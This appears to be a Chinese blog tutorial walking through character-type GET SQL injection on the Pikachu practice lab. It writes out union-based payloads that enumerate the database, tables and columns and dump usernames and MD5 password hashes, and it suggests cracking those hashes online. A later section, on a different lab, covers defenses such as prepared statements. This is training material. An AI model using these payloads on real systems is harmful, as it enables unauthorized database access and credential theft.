NCNIPC--皮卡丘web靶场SQL注入(字符型注入)

我们打开我们的靶场,我们带着同学简单练习一个字符型注入(get),点击SQL-Inject,点击字符型注入(get),我们直接就测试一下输入1’如图所示。
输入1’测试sql注入
点击“查询”按钮后,回显出报错了,报错信息为“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1”
这个报错信息就是典型的可能存在sql注入的信息,然后我们输入永真式1’or 1=1 #然后点击“查询”按钮,因为永真式恒成立,所以我们得到了全部信息。
在这里插入图片描述
我们输入

1'order by 1#

探测有回显多少个行数,输入

1'order by 1#

发现回显正常,然后输入

1'order by 2#

发现回显正常,如图所示,输入

1'order by 3#

发现回显错误

Unknown column '3' in 'order clause'

那么就说明后端数据库传递过来的数据一共回显两行。
输入1'order by 2#发现回显正常
接下来我们就利用union进行联合查询注入,我们输入

1'union select 1,database()#

然后点击查询,会回显数据库名
在这里插入图片描述
根据回显的信息,我们得到数据库名为pikachu,然后我们可以继续探测一下数据库用户名,输入

1'union select 1,user()#

根据回显root@localhost得到数据库用户名为root。
我们已知数据库名,接下来我们想要拿到数据表名,我们输入

1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')#

如图所示。
在这里插入图片描述
我们已经知道了数据表名,那么我们接下来就是要查询数据表中的列名,比如我们关注users表,那么我们在输入框输入

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#

如图所示。
在这里插入图片描述
我们发现了我们比较关注的username与password,所以我们尝试拿到这两个的字段名,我们输入

1'union select (select group_concat(username) from users),(select group_concat(password) from users)#

如图所示。
在这里插入图片描述
拿到了password的密码的md5值(这个靶场是使用md5加密的),然后我们可以使用彩虹表破解,或者使用一些在线破解网站尝试破解,比如cmd5网站等,网址为https://www.cmd5.com,如图所示,我们sql的练习就先介绍到这里,还有很多其他类型的sql注入,大家可以自己尝试去做一下。
在这里插入图片描述

### 关于渊龙 Sec 靶场中的 SQL 注入漏洞及其解决方案 #### 定义与背景 SQL注入是一种常见的安全漏洞,允许攻击者通过操纵输入数据来执行未授权的数据库命令。在Web应用程序中,如果开发者未能正确处理用户输入,则可能导致此类漏洞的发生。 #### 渊龙 Sec 靶场环境下的具体表现形式 在渊龙Sec靶场环境中,可能存在多种场景模拟实际应用中存在的SQL注入风险。例如,在某些情况下,当使用MyBatis框架时,如果不恰当地构建查询字符串或者错误地配置动态SQL部分,就容易引发安全隐患[^1]。另外,像 Victor CMS 和 DedeCMS 这样的内容管理系统也可能因为特定参数(如`tag_alias`)缺乏足够的验证而暴露出SQL注入的风险点[^2][^3]。 #### 解决方案建议 为了有效防止SQL注入攻击并修复已知的安全缺陷: - **采用预编译语句**:对于所有涉及外部输入的数据访问逻辑,应尽可能使用PreparedStatement或其他支持预编译功能的方式替代简单的字符串拼接方法来组装SQL指令。 ```java String query = "SELECT * FROM users WHERE username=? AND password=?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, userInputUsername); pstmt.setString(2, hashPassword(userInputPassword)); ResultSet rs = pstmt.executeQuery(); ``` - **严格校验和过滤输入**:确保每一个来自客户端提交的信息都经过严格的正则表达式匹配或者其他有效的净化手段去除潜在危险字符;同时还要考虑设置合理的长度限制以及白名单机制只接受预期范围内的值。 - **最小权限原则**:运行数据库连接的应用程序应当遵循最低特权准则,即仅授予完成其工作所需的最少资源访问权能,从而减少一旦发生入侵事件后的损害程度。 - **定期审查代码库**:持续关注第三方依赖项更新情况,并及时修补官方发布的补丁包以应对新发现的问题;内部开发团队也需要养成良好的编程习惯并通过静态分析工具辅助检测可能存在的隐患部位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全专家1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值